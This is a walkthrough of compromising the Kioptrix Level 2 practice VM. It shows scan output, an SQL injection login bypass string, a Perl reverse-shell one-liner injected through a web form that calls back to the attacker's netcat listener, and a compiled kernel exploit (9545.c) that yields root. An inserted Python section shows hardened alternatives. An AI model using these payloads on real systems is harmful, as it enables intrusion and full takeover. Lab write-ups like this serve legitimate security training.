Monday, January 28, 2019

Kioptrix Level 2

netdiscover -r 123.123.123.0/24

123.123.123.101 00:0c:29:9c:4b:ac      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.101

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            655/udp  status
|_  100024  1            658/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s


http://123.123.123.101/

The Remote System Administration Login web page was tested for SQL injection, and it was found that the login can be bypassed by submitting the following as both the username and the password:


1' or '1' = '1


After logging in, we try command injection:


;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...

connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$
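The two web-layer weaknesses used above, the login bypass with the quoted string and the command injection through a form field, are shown side by side with their hardened forms in the added example below. This is not the VM's code: it assumes the login query and the form's shell command were built by string concatenation, and it assumes the injectable field was an IP address handed to ping, neither of which the write-up states.

```python
import ipaddress
import sqlite3
from typing import List, Optional

# Constructed in-memory user table standing in for the VM's credential store
# (assumption: the page shows neither the real schema nor the login query).
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_concat(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Vulnerable pattern: the submitted values are spliced into the SQL text,
    # so a quote in the input closes the literal and the rest becomes syntax.
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None

def login_param(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Hardened form: bound parameters keep the input as data; the same string
    # is compared literally against the stored username and does not match.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None

def ping_command_concat(target: str) -> str:
    # Vulnerable pattern (assumed ping field): one shell line built from user
    # input, so a ';' in the field starts a second command. Shown, never run.
    return "ping -c 3 " + target

def ping_command_validated(target: str) -> Optional[List[str]]:
    # Hardened form: accept only a syntactically valid IP address and return
    # an argv list intended for subprocess.run(argv), with no shell involved.
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError:
        return None
    return ["ping", "-c", "3", str(addr)]

if __name__ == "__main__":
    payload = "1' or '1' = '1"          # the bypass string from the write-up
    db = make_db()
    print("concatenated login:", login_concat(db, payload, payload))   # True
    print("parameterised login:", login_param(db, payload, payload))   # False
    injected = ";perl -e 'print 1'"     # constructed stand-in for the page's one-liner
    print(ping_command_concat(injected))
    print(ping_command_validated(injected))           # None
    print(ping_command_validated("123.123.123.201"))  # ['ping', '-c', '3', '123.123.123.201']
```

Logging the rejected inputs from `ping_command_validated` and the failed parameterised logins gives the detection signal for both attempts.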


cd /tmp


gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r--  1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x  1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x  1 apache apache 6762 Oct  1 15:16 linux-sendpage
bash-3.00$

./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#



